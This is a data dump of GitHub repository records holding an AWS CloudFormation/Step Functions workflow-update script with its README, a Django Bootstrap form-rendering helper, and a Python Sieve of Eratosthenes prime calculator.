client.list_buckets()[\"Buckets\"]:\n\t\t\tif bucket_info[\"Name\"] == param_value:\n\t\t\t\treturn\n\n\t\traise Exception(\"Specified bucket '{}' does not exist\".format(param_value))\n\n\tdef check_storage_class(param_name, param_value):\n\t\tif param_value not in [ \"STANDARD\", \"STANDARD_IA\", \"ONEZONE_IA\" ]:\n\t\t\traise Exception(\"{} must be one of [STANDARD|STANDARD_IA|ONEZONE_IA]\".format(param_name))\n\n\tif kwargs is None:\n\t\traise Exception(\"Incorrect parameters supplied to save_workflow_to_s3()\")\n\n\t# Check parameters\n\t_check_parameters(\"Bucket\", kwargs.get(\"Bucket\", None), check_bucket_exists)\n\t_check_parameters(\"Key\", kwargs.get(\"Key\", None))\n\t_check_parameters(\"SourceFileName\", kwargs.get(\"SourceFileName\", None), _check_file_exists)\n\t_check_parameters(\"S3StorageClass\", kwargs.get(\"S3StorageClass\", None), check_storage_class)\n\n\t# Upload file to S3\n\tclient = boto3.client('s3')\n\tclient.put_object(\n\t\tBucket=kwargs[\"Bucket\"],\n\t\tKey=kwargs[\"Key\"],\n\t\tBody=open(kwargs[\"SourceFileName\"], \"r\"),\n\t\tContentType=\"application/json\",\n\t\tStorageClass=\"STANDARD\")\n\ndef update_stack(**kwargs):\n\t\"\"\"\n\tCreates a ChangeSet and then Executes if changes are detected.\n\n\tUsing a ChangeSet ensures that Macros are re-executed, to detect all changes, in this case\n\tthe modification to the StateMachine workflow saved to S3\n\n\tParameters:\n\n\t\tStackName\t\t\t\t\tThe name of the stack to be updated. Stack must already exist and be updateable\n\t\tTemplateFileName\t\t\tThe location of the template with which to update the stack.\n\t\tS3KeyParameterName\t\t\tThe name of the parameter that identifies the S3 object key holding the revised workflow\n\t\tS3Key \t\t\t\t\t\tThe S3 key to assign to the S3KeyParameter\n\t\tSMResourceParameterName\t\tThe name of the parameter that identifies the StateMachine resource to be updated\n\t\tSMResource \t\t\t\t\tThe logical resource name to assign to the SMResourceParameter\n\t\tDescription \t\t\t\tThe description for this stack update\n\n\tReturns:\n\n\t\tNothing\n\n\t\"\"\"\n\n\tdef check_stack_exists_and_updatable(param_name, param_value):\n\t\tclient = boto3.client('cloudformation')\n\t\tresp = client.list_stacks(StackStatusFilter=[\"CREATE_COMPLETE\", \"UPDATE_COMPLETE\"])\n\t\tcont = True\n\t\twhile cont:\n\t\t\tfor stack in resp[\"StackSummaries\"]:\n\t\t\t\tif stack[\"StackName\"] == param_value:\n\t\t\t\t\treturn # Exists and ready for update\n\t\t\tnext_token = resp.get(\"NextToken\", None)\n\t\t\tif next_token:\n\t\t\t\tresp = client.list_stacks(StackStatusFilter=[\"CREATE_COMPLETE\", \"UPDATE_COMPLETE\"], NextToken=next_token)\n\t\t\telse:\n\t\t\t\tcont = False\n\t\traise Exception(\"Specified Stack '{}'' either does not exist or is not ready for update\".format(param_value))\n\n\tdef check_template_params_exist(param_name, param_value):\n\t\ttemplate = json.load(open(param_value, \"r\"))\n\t\ttemplate_parameters = template.get(\"Parameters\", {})\n\t\tfor template_param_name in [kwargs[\"S3KeyParameterName\"], kwargs[\"SMResourceParameterName\"]]:\n\t\t\tif template_parameters.get(template_param_name, None) == None:\n\t\t\t\traise Exception(\"Parameter '{}' not present in template '{}'\".format(template_param_name, param_value))\n\t\t\telse:\n\t\t\t\tdel template_parameters[template_param_name]\n\n\t\tif len(template_parameters):\n\t\t\t# Error if further parameters in the template, with no default value\n\t\t\tfor k, v in template_parameters.viewitems():\n\t\t\t\tif v.get(\"Default\", None) == None:\n\t\t\t\t\traise Exception(\"Additional parameters in template '{}' without defaults (e.g. '{}')\".format(param_value, k))\n\n\tdef wait_for_change_set(change_set_id):\n\t\tresp = client.describe_change_set(ChangeSetName=change_set_id)\n\t\tsleep_time = 2\n\t\twhile resp['Status'] not in [\"CREATE_COMPLETE\", \"FAILED\"]:\n\t\t\ttime.sleep(sleep_time)\n\t\t\tsleep_time = sleep_time * 2 # To avoid throttling errors due to too many calls to describe_change_set\n\t\t\tresp = client.describe_change_set(ChangeSetName=change_set_id)\n\t\treturn resp\n\n\tif kwargs is None:\n\t\traise Exception(\"Incorrect parameters supplied to save_workflow_to_s3()\")\n\n\t# Check parameters\n\t_check_parameters(\"StackName\", kwargs.get(\"StackName\", None), check_stack_exists_and_updatable)\n\t_check_parameters(\"TemplateFileName\", kwargs.get(\"TemplateFileName\", None), [_check_file_exists, check_template_params_exist])\n\t_check_parameters(\"S3KeyParameterName\", kwargs.get(\"S3KeyParameterName\", None))\n\t_check_parameters(\"S3Key\", kwargs.get(\"S3Key\", None))\n\t_check_parameters(\"SMResourceParameterName\", kwargs.get(\"SMResourceParameterName\", None))\n\t_check_parameters(\"SMResource\", kwargs.get(\"SMResource\", None))\n\n\t# Create ChangeSet for the Stack\n\tprint 'Creating Change Set'\n\tclient = boto3.client('cloudformation')\n\tresp = client.create_change_set(\n\t\tStackName=kwargs[\"StackName\"],\n\t\tTemplateBody=open(kwargs[\"TemplateFileName\"], \"r\").read(),\n\t\tParameters=[\n\t\t\t\t{\n\t\t\t\t\t\"ParameterKey\" : kwargs[\"S3KeyParameterName\"],\n\t\t\t\t\t\"ParameterValue\" : kwargs[\"S3Key\"],\n\t\t\t\t\t\"UsePreviousValue\" : False\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"ParameterKey\" : kwargs[\"SMResourceParameterName\"],\n\t\t\t\t\t\"ParameterValue\" : kwargs[\"SMResource\"],\n\t\t\t\t\t\"UsePreviousValue\" : False\n\t\t\t\t}\n\t\t\t],\n\t\tCapabilities=[\"CAPABILITY_IAM\", \"CAPABILITY_NAMED_IAM\"],\n\t\tDescription=kwargs[\"Description\"],\n\t\tChangeSetName='A'+''.join(str(uuid.uuid4()).split(\"-\")),\n\t\tChangeSetType=\"UPDATE\")\n\n\t# Determine state of the ChangeSet\n\tprint 'Waiting on Change Set creation'\n\tchange_set_id = resp['Id']\n\tresp = wait_for_change_set(change_set_id)\n\n\t# Validate the expected StateMachine resource is being updated\n\tprint 'Validating Change Set status'\n\n\tif resp[\"Status\"] == \"FAILED\":\n\t\traise Exception(\"ChangeSet '{}' creation FAILED - '{}'\".format(change_set_id, resp[\"StatusReason\"]))\n\n\tfound_required_change = False\n\tfor chg in resp['Changes']:\n\t\tif chg['ResourceChange']['LogicalResourceId'] == kwargs[\"SMResource\"]:\n\t\t\t# The target StateMachine will be updated\n\t\t\tfound_required_change = True\n\t\t\tbreak\n\n\tif not found_required_change:\n\t\traise Exception(\"ChangeSet '{}' does not modify StateMachine '{}' - check workflow file\".format(change_set_id, kwargs[\"SMResource\"]))\n\n\t# Execute Change Set to apply the changes\n\tprint 'Applying Change Set'\n\tclient.execute_change_set(ChangeSetName=change_set_id)\n\n\tprint 'Waiting on Change Set execution'\n\tresp = wait_for_change_set(change_set_id)\n\n\tif resp[\"Status\"] == \"FAILED\":\n\t\traise Exception(\"ChangeSet '{}' execution FAILED - '{}'\".format(change_set_id, resp[\"StatusReason\"]))\n\n\tif resp[\"ExecutionStatus\"] != \"AVAILABLE\":\n\t\traise Exception(\"ChangeSet '{}' execution status is '{}'\".format(change_set_id, resp[\"ExecutionStatus\"]))\n\n\tprint 'Update has completed successfully'\n\ndef update_workflow(**kwargs):\n\t\"\"\"\n\tUpdates S3 and then updates the stack\n\t\"\"\"\n\tprint 'Saving updated Workflow'\n\tsave_kwargs = {k:v for k,v in filter(lambda t: t[0] in [\"Bucket\", \"Key\", \"SourceFileName\", \"S3StorageClass\"], kwargs.items()) }\n\tsave_workflow_to_s3(**save_kwargs)\n\n\tprint 'Updating StateMachine stack'\n\tupdate_kwargs = {k:v for k,v in filter(lambda t: t[0] in [\"StackName\", \"Description\", \"TemplateFileName\", \"S3KeyParameterName\", \"SMResourceParameterName\", \"SMResource\"], kwargs.items()) }\n\tupdate_kwargs[\"S3Key\"] = \"s3://{}/{}\".format(kwargs[\"Bucket\"], kwargs[\"Key\"])\n\tupdate_stack(**update_kwargs)\n\nif __name__ == \"__main__\":\n\timport argparse\n\tparser = argparse.ArgumentParser(description=\"Demos how a commit hook on workflow JSON file changes could trigger a CloudFormation update of the State Machine\")\n\tparser.add_argument(\"-b\", \"--Bucket\", help=\"S3 bucket which stores the workflow JSON files\", required=True)\t\n\tparser.add_argument(\"-k\", \"--Key\", help=\"S3 key which identifies the workflow JSON file\", required=True)\t\n\tparser.add_argument(\"-f\", \"--SourceFileName\", help=\"Filename of the workflow JSON to be saved to S3\", required=True)\n\tparser.add_argument(\"-d\", \"--Description\", help=\"Description of the ChangeSet to the Stack (e.g. Commit)\", default=\"\")\n\tparser.add_argument(\"-s\", \"--StackName\", help=\"Name of the Stack to be updated\", required=True)\n\tparser.add_argument(\"-t\", \"--TemplateFileName\", help=\"Filename of the template of the Stack to be updated\", required=True)\n\tparser.add_argument(\"-c\", \"--S3StorageClass\", help=\"S3 storage class to use for the JSON workflow file\", default=\"STANDARD\")\n\tparser.add_argument(\"-p1\", \"--S3KeyParameterName\", help=\"Name of S3Key parameter in the Stack template\", default=\"S3Key\")\n\tparser.add_argument(\"-p2\", \"--SMResourceParameterName\", help=\"Name of StateMachine parameter in the Stack template\", default=\"SMResource\")\n\tparser.add_argument(\"-v2\", \"--SMResource\", help=\"Name of StateMachine resource in the Stack template, to assign to SMResourceParameterName\", default=\"MyStateMachine\")\n\n\targs = parser.parse_args()\t\n\n\tupdate_workflow(\n\t\tBucket=args.Bucket,\n\t\tKey=args.Key,\n\t\tSourceFileName=args.SourceFileName,\n\t\tS3StorageClass=args.S3StorageClass,\n\t\tStackName=args.StackName,\n\t\tDescription=args.Description,\n\t\tTemplateFileName=args.TemplateFileName,\n\t\tS3KeyParameterName=args.S3KeyParameterName,\n\t\tSMResourceParameterName=args.SMResourceParameterName,\n\t\tSMResource=args.SMResource)\n" }, { "alpha_fraction": 0.6541084051132202, "alphanum_fraction": 0.6597340703010559, "avg_line_length": 64.17778015136719, "blob_id": "9422fc31ec688dd7fde3dbb65cce770811fb6377", "content_id": "122872fd81d3eeabd1d67ec3962501fc97855543", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5866, "license_type": "permissive", "max_line_length": 308, "num_lines": 90, "path": "/README.md", "repo_name": "gford1000-aws/step-function-workflow-updater", "src_encoding": "UTF-8", "text": "# step-function-workflow-updater\n\nIt is often desirable to separate the ability of development teams between writing application code (consuming data from infrastructure\nresources and creating new data, to be stored in other resources or returned to callers) from the management of the underlying \ninfrastructure itself.\n\nWith serverless programming in AWS Lambda and AWS StepFunctions, this means that dev teams need to be able to create and deploy Lambdas\n(stateless application code) and StateMachine workflows (which orchestrate the Lambda invocation sequence), whilst ensuring\nseparate control of the infrastructure resources (DBs, StateMachines etc.) and the data within them (via IAM policies).\n\nThis repo provides an example of how to achieve this, whereby the JSON definition of the workflow can be managed outside of its \ndeployment via CloudFormation, so that the separation of security privilege can be maintained.\n\nThe approach leverages the use of CloudFormation [macros](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-macros.html) to inject the new workflow JSON into the StateMachine resource as part of a CloudFormation Change Set.\n\nArtefacts in the repo:\n\n* __[inject_workflow_macro.cform](inject_workflow_macro.cform)__ which deploys the macro. \n\n* __[step_function_workflow_updater.cform](step_function_workflow_updater.cform)__ which is a basic CloudFormation template that can \ndeploy a stack containing a StateMachine and its associated IAM Role\n\n* __[deploy_step_function_workflow.py](deploy_step_function_workflow.py)__ which is a helper script to manage updates to stacks containing a\nStateMachine, whenever its associated workflow definition is changed. This script will save the JSON workflow to S3 and then create a new\nChange Set in CloudFormation, prior to execution. The idea is that this script can be used as a commit hook for workflow updates.\n\n## inject_workflow_macro.cform\n\nThis is a simple Cloudformation template to declare the Lambda and associate it with the Cloudformation Macro:\n\n![alt text](https://github.com/gford1000-aws/step-function-workflow-updater/blob/master/inject%20workflow%20macro.png \"Script per designer\")\n\n### Arguments\n\n| Argument | Description |\n| ---------------------------- |:---------------------------------------------------------------------------:|\n| MacroName | Name of the Cloudformation Macro, as used in other templates |\n| WorkflowBucketName | Bucket which will contain the JSON workflows to be injected |\n| MacroLogTTL | TTL of CloudWatch logs for the Lambda function |\n\n\n### Outputs\n\n| Output | Description |\n| ----------------------- |:--------------------------------------------------------------:|\n| MacroName | The name of Macro |\n\n\n### Notes\n\n* The macro will traverse the internet to access the specified S3 key; to prevent this, operate the Lambda within a VPC. [https://github.com/gford1000-aws/lambda_s3_access_using_vpc_endpoint](https://github.com/gford1000-aws/lambda_s3_access_using_vpc_endpoint) provides an example of how to achieve this. \n* The macro retrieves the workflow JSON data, based on the value of the `S3Key` parameter which must be present in the template and which is expected to be of the form `s3://BUCKET_NAME/KEY`)\n* The macro updates a StateMachine resource in the template, according to the resource identified by the value of the `SMResource` parameter which must be present in the template.\n* The macro is linked to an \n[alias](https://docs.aws.amazon.com/lambda/latest/dg/versioning-aliases.html) rather than the Lambda itself - this allows the Lambda to be easily changed/tested if required.\n* The created role provides full read access to the specified bucket - this scope should reduced if the bucket is used for other activities.\n\n\n## step_function_workflow_updater.cform\n\nThis is a trivial Cloudformation template to declare the Lambda and associate it with the Cloudformation Macro:\n\n![alt text](https://github.com/gford1000-aws/step-function-workflow-updater/blob/master/step%20function%20workflow%20updater.png \"Script per designer\")\n\n### Arguments\n\n| Argument | Description |\n| -------------------- |:---------------------------------------------------------------------------:|\n| S3Key | Key to the object containing the JSON workflow to be injected |\n| SMResource | Name of the template StateMachine resource to be modified |\n\n\n### Outputs\n\n| Output | Description |\n| ----------------------- |:--------------------------------------------------------------:|\n| StateMachineArn | The Arn of the StateMachine, so it can be executed |\n| RoleArn | The Arn of the StateMachine Role, so it can be updated |\n\n\n### Notes\n\n* The RoleArn is returned so that policies can be attached as the changes to the workflow JSON lead to the need to be able to access further AWS resources (e.g. to invoke specified Lambdas or Activities)\n* The Role has no access to any resources after the initial deployment of the stack with this template\n* This template assumes that the Cloudformation Macro has been created with its default name, `StepFunctionWorkflowInjector` \n* The Macro is called as a `Transform`, so it has full visibility of the entire Cloudformation template\n\n## Licence\n\nThis project is released under the MIT license. See [LICENSE](LICENSE) for details.\n" } ]
2
nandel/django-form-helper
https://github.com/nandel/django-form-helper
50917a5245f13d7286c5e9cb0d9cda0dcdbb3aa5
89a447583eb4a199cdac264407d8242f82d7f642
4dbff0eec143bc6ee6a1f66ac7a6697b6937ef15
refs/heads/master
2021-01-19T09:44:08.773068
2013-11-10T14:18:11
2013-11-10T14:18:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6045694351196289, "alphanum_fraction": 0.6063268780708313, "avg_line_length": 21.68000030517578, "blob_id": "19e0997b2d8af34008c2fb29889db5c427f0ab66", "content_id": "6623dd3e36970eb6f9a02c2f450c6a16de8fd7c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 569, "license_type": "no_license", "max_line_length": 91, "num_lines": 25, "path": "/README.md", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "Django Form helper\n==================\ndjango-form-helper is a tool to render forms using bootstrap3 while developping with django\n\nInstall\n-----\nAdd ``form_helper`` in your ``INSTALLED_APPS``::\n\n\tINSTALLED_APPS = (\n\t...\n\t'form_helper',\n\t)\n\t\n\nUsage\n------\nIn your template use this syntax::\n\n {% load form_helper_bootstrap %}\n <fieldset>\n <legend>Info</legend>\n {{ form.title_field|render_field:\"horizontal\" }}\t\n {{ form.date_field|render_field:\"horizontal\" }}\t\n {{ form.text_field|render_field:\"horizontal\" }}\t\n </fieldset>\n\n\n" }, { "alpha_fraction": 0.5901544094085693, "alphanum_fraction": 0.5901544094085693, "avg_line_length": 29.380531311035156, "blob_id": "1069b35535d6eefa64a6540e4cb9e2846e50d283", "content_id": "4cd045bd27bf3649b07cb7dc96aab7e4d78d8516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3433, "license_type": "no_license", "max_line_length": 130, "num_lines": 113, "path": "/form_helper/templatetags/form_helper_bootstrap.py", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "\"\"\"\nShortcut to use Bootstrap Forms\n\"\"\"\nfrom django import template\nfrom django.template import Context, loader\nimport form_helper\n\nregister = template.Library()\n\n# ---------------------------------------------------------\n# DEFAULT RENDER FUNCTONS TO WORK AUTOMATIC WITH BOOTSTRAP\n# ---------------------------------------------------------\n\n@register.filter\ndef render(form, style=None):\n\t\"\"\"\n\tRender the form with bootstrap\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\treturn form_helper.render(form, 'form_helper/' + template + '/form.html')\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_fields(form, style=None):\n\t\"\"\"\n\tRender the Field with bootstrap\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\treturn form_helper.render_fields(form, 'form_helper/' + template + '/form-fields.html')\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_field(field, style=None):\n\t\"\"\"\n\tRender a especified field with bootstrap\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\ttry:\n\t\tfield_classes = field.field.widget.attrs.get('class', '')\n\t\tfield_classes += ' form-control'\n\t\tfield.field.widget.attrs['class'] = field_classes\n\texcept:\n\t\tpass\n\n\treturn form_helper.render_field(field, 'form_helper/' + template + '/field-auto.html')\n\n# ---------------------------------------------------------\n# Functions to use with Prepend style of bootstrap\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend_super(name, label, prepend=None, input=None, value=None, default=None, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with a prepend accord to the parameters\n\tCan pass the input\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\ttmplt = loader.get_template('form_helper/' + template + '/field-with-prepend.html')\n\tcontext = Context({\n\t\t'name' : name,\n\t\t'label' : label,\n\t\t'value' : value,\n\t\t'default' : default,\n\t\t'help_text' : help_text,\n\t\t'errors' : errors,\n\t\t'prepend' : prepend,\n\t\t'input' : input\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend(name, label, prepend=None, value=None, default=None, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with prepend accord to the parameters\n\t\"\"\"\n\treturn field_prepend_super(name, label, prepend, None, value, default, style, help_text, errors)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend_email(name, label, value=None, default=None, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with a prepend for email fields\n\t\"\"\"\n\tprepend = '<i class=\"glyphicon glyphicon-envelope\"></i>'\n\treturn field_prepend(name, label, prepend, value, default, style, help_text, errors)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend_password(name, label, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with a prepend for pasword fields\n\t\"\"\"\n\tinput = '<input type=\"password\" class=\"form-control\" id=\"id_' + name + '\" name=\"' + name + '\" placeholder=\"' + label +'\">'\n\tprepend = '<i class=\"glyphicon glyphicon-lock\"></i>'\n\treturn field_prepend_super(name, label, prepend, input, None, None, style, help_text, errors)\n" }, { "alpha_fraction": 0.75157231092453, "alphanum_fraction": 0.75157231092453, "avg_line_length": 31.931034088134766, "blob_id": "eb31164c0011fbe61d6afefd984e416f6fbdd7b3", "content_id": "048f506d269e1346259df694504eb12bb75a6458", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 954, "license_type": "no_license", "max_line_length": 78, "num_lines": 29, "path": "/form_helper/forms.py", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "from django.template import Context, loader\n\nclass BaseForm(object):\n\t\"\"\"\n\tAbstract class to add some method to render the form\n\t\"\"\"\n\tdef as_template(self, template):\n\t\t\"Returns this form fields rendered as Bootstrap form.\"\n\t\ttmplt = loader.get_template(template)\n\t\tcontext = Context({\n\t\t\t'form': self,\n\t\t\t})\n\t\treturn tmplt.render(context)\n\nclass BaseBootstrap(BaseForm):\n\t\"\"\"\n\tAbstract class to add some method to render the form as Bootstrap\n\t\"\"\"\n\tdef as_bootstrap(self):\n\t\t\"Returns this form fields rendered as Bootstrap form.\"\n\t\treturn self.as_template('form_helper/bootstrap/form-fields.html')\n\n\tdef as_bootstrap_horizontal(self):\n\t\t\"Returns this form fields rendered as Bootstrap form-horizontal.\"\n\t\treturn self.as_template('form_helper/bootstrap-horizontal/form-fields.html')\n\n\tdef as_bootstrap_inline(self):\n\t\t\"Returns this form fields rendered as Bootstrap form-inline.\"\n\t\treturn self.as_template('form_helper/bootstrap-inline/form-fields.html')" }, { "alpha_fraction": 0.5788667798042297, "alphanum_fraction": 0.5793772339820862, "avg_line_length": 26.605634689331055, "blob_id": "e9275fbf2f1d493513ace48353bf15649fb643ab", "content_id": "ee84eb62966e7e9a855f9e18e7ad50a54f418a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1959, "license_type": "no_license", "max_line_length": 188, "num_lines": 71, "path": "/form_helper/templatetags/form_helper.py", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.template import Context, loader\n\nregister = template.Library()\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render(form, template=None):\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'form': form,\n\t\t'method' : 'POST',\n\t\t'action' : '',\n\t\t'template' : template,\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_fields(form, template=None):\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'form': form,\n\t\t'method' : 'POST',\n\t\t'action' : '',\n\t\t'template' : template,\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_field(field, template=None):\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'field': field,\n\t\t'template' : template,\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef form_field(name, label, value=None, template=None, type=\"text\", default=None, help_text=None, errors=None, classes=None):\n\tif not template:\n\t\tinput_fields = ['text', 'password', 'color', 'date', 'datetime', 'datetime-local', 'email', 'file', 'hidden', 'image', 'month', 'number', 'range', 'search', 'tel', 'time', 'url', 'week']\n\n\t\tif type in input_fields:\n\t\t\ttemplate = 'form_helper/field-types/input.html'\n\t\telif type == 'checkbox' or type == 'radio' or type == 'textarea':\n\t\t\ttemplate = 'form_helper/field-types/' + type + '.html'\n\t\telse:\n\t\t\tprint \"%s field have a invalid type.\" % (name)\n\t\t\traise \"%s field have a invalid type.\" % (name)\n\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'name': name,\n\t\t'label': label,\n\t\t'value': value,\n\t\t'default': default,\n\t\t'type': type,\n\t\t'style': style,\n\t\t'help_text': help_text,\n\t\t'errors': errors,\n\t\t'classes' : classes\n\t})\n\treturn tmplt.render(context)" } ]
4
yanxi853600/MSE_Tscore
https://github.com/yanxi853600/MSE_Tscore
f8bfde92e2472fc10af8d0b9c8548aabd1350483
a521ea2fde2b4989d8cd61a2703ccef581f9de30
98f83397555d2e9337868ed5ca85608ff4971ad8
refs/heads/master
2020-08-23T06:33:36.524792
2019-10-21T12:36:02
2019-10-21T12:36:02
216,562,090
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6141214966773987, "alphanum_fraction": 0.6447728276252747, "avg_line_length": 27.092308044433594, "blob_id": "13151fe37f448098f85b5ab9dbe3cb8b0cf9e03f", "content_id": "1c99b5be4259aa0890bda70d851c3d03ed837a21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2023, "license_type": "no_license", "max_line_length": 62, "num_lines": 65, "path": "/MSE.py", "repo_name": "yanxi853600/MSE_Tscore", "src_encoding": "UTF-8", "text": "#(10/9-homework_7107029258_林彥希)\n#1. 樣本集當母體 2.找出3個欄位 3. 對欄位進行抽樣 4. 做區間估計&T-檢定\n\n#import numpy as np\nimport pandas as pd\n#import matplotlib.pyplot as plt\nfrom scipy import stats\nimport math\n\n#download dataset\navocado=pd.read_csv(\"avocado.csv\")\n\ndf=pd.DataFrame([avocado[\"Total Volume\"],\n avocado[\"Total Bags\"],\n avocado[\"AveragePrice\"],\n avocado[\"Small Bags\"],\n avocado[\"Large Bags\"],\n avocado[\"XLarge Bags\"]]).T\n\n#大樣本區間估計\npopulation = []\nfor x in range(18249):\n Sample=df.sample(n=3,axis=1)\n \n population.append(Sample.mean())\n#print(\"母體平均:\", sum(population)/18249.0)\n \nSample_size = 100\n#Sample = np.random.choice(a=population, size=Sample_size) \n\n\nSample_mean = Sample.mean()\nprint(\"樣本平均:\", Sample_mean)\nSample_stdev = Sample.std()\nprint(\"樣本標準差:\", Sample_stdev)\nsigma = Sample_stdev/math.sqrt(Sample_size-1)\nprint(\"樣本計算出的母體標準差:\", sigma)\nz_critical = stats.norm.ppf(q=0.975)\nprint(\"Z分數:\", z_critical)\nmargin_of_error = z_critical * sigma\nconfidence_interval = (Sample_mean - margin_of_error,\n Sample_mean + margin_of_error)\n#print(confidence_interval)\nconf_int = stats.norm.interval(alpha=0.95, \n loc=Sample_mean, \n scale=sigma)\nprint(\"區間估計: \",conf_int[0], conf_int[1])\n\n\n#T檢定\npopulation_mean = 18249 #母體平均\n\nSample_size = len(Sample)\nSample_mean = Sample.mean()\n#print(\"樣本平均:\", Sample_mean)\nSample_stdev = Sample.std()\n#print(\"樣本標準差:\", Sample_stdev)\nsigma = Sample_stdev/math.sqrt(Sample_size-1)\n#print(\"樣本計算出的母體標準差:\", sigma)\nt_obtained = (Sample_mean-population_mean)/sigma\nprint(\"檢定統計量:\", t_obtained)\n#print(stats.ttest_1samp(a=Sample, popmean=population_mean))\n\nt_critical = stats.t.ppf(q=0.975, df=Sample_size-1)\nprint(\"t分數:\", t_critical)\n\n" } ]
1
vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes
https://github.com/vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes
7d7ce381185c723aef8080c888ebb588b1107e58
f141f6d0d2e6924d1f0bac8a66d6cce396087bdc
f9bd9c8568fd8f63557aa9b58681d8451c58d5de
refs/heads/main
2023-04-18T06:16:13.795144
2021-04-28T10:53:11
2021-04-28T10:53:11
343,320,047
0
0
null
2021-03-01T06:59:31
2021-03-01T07:08:32
2021-04-28T10:53:11
Python
[ { "alpha_fraction": 0.4771833121776581, "alphanum_fraction": 0.4948859214782715, "avg_line_length": 33.802818298339844, "blob_id": "5c0419e94a71b97c4fe253a82dee778d30e7c8cd", "content_id": "f958a02361d22ca59ed5bbd0467c34d2ac8029f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2542, "license_type": "permissive", "max_line_length": 103, "num_lines": 71, "path": "/Prime number calculator using Sieve of Eratosthenes.py", "repo_name": "vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes", "src_encoding": "UTF-8", "text": "def userinput() :\r\n userinput_function = eval(input())\r\n return userinput_function\r\ndef prime_number_list_maker(par1,par2) :\r\n prime_list = []\r\n for x in range(par1,par2+1,1) :\r\n prime_list = prime_list + [x]\r\n return prime_list\r\ndef prime_numbers_finder(par1,par2,par3) :\r\n list1 = par3[:]\r\n for diviser in range(2,par2+1,1) :\r\n index = 0\r\n for dividend in list1 :\r\n if dividend != 0 :\r\n if diviser < dividend :\r\n remainder = dividend % diviser\r\n if remainder == 0 :\r\n list1[index] = 0\r\n index = index + 1\r\n result = []\r\n for x1 in list1 :\r\n if x1 > 1 :\r\n result = result + [x1]\r\n return result\r\ndef main() :\r\n print('================================================================+')\r\n print('* Please enter a positive integer : ',end = '')\r\n userinput1 = userinput()\r\n print('* Please enter another positive integer : ',end = '')\r\n userinput2 = userinput()\r\n if userinput1 > userinput2 :\r\n smaller_number = userinput2\r\n userinput2 = userinput1\r\n userinput1 = smaller_number\r\n print()\r\n print('>> Calculating, please wait...',end='')\r\n start_time = time()\r\n prime_number_list = prime_number_list_maker(userinput1,userinput2)\r\n user_result = prime_numbers_finder(userinput1,userinput2,prime_number_list)\r\n finish_time = time()\r\n print()\r\n print()\r\n print('>> PRIME NUMBERS : ',user_result)\r\n print()\r\n print('>> Total time taken for calculation : ',finish_time - start_time,'second/s')\r\n print()\r\n print('>> Total number of prime numbers between',userinput1,'and',userinput2,': ',len(user_result))\r\n print('================================================================+')\r\n print()\r\nfrom time import time\r\ndone = False\r\nprint()\r\nprint(' +------------------- PRIME NUMBER CALCULATOR ---------------------+')\r\nprint(' Using Sieve of Eratosthenes')\r\nprint()\r\nwhile not done :\r\n done2 = False\r\n main()\r\n while not done2 :\r\n userinputx = input('* Press C to Continue or Press E to Exit : ')\r\n if userinputx == 'c' or userinputx == 'C' :\r\n done2 = True\r\n print()\r\n elif userinputx == 'e' or userinputx == 'E' :\r\n done = True\r\n done2 = True\r\n print()\r\n else :\r\n print()\r\n print(' >>>> WRONG INPUT ! <<<<')\r\n print()\r\n" }, { "alpha_fraction": 0.743790864944458, "alphanum_fraction": 0.7607843279838562, "avg_line_length": 381.5, "blob_id": "cf0c2e7dd6757d55f2ecae0236a87c350b1d6a0e", "content_id": "f39915847f7805abe51421e731a36f58a92354d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 765, "license_type": "permissive", "max_line_length": 710, 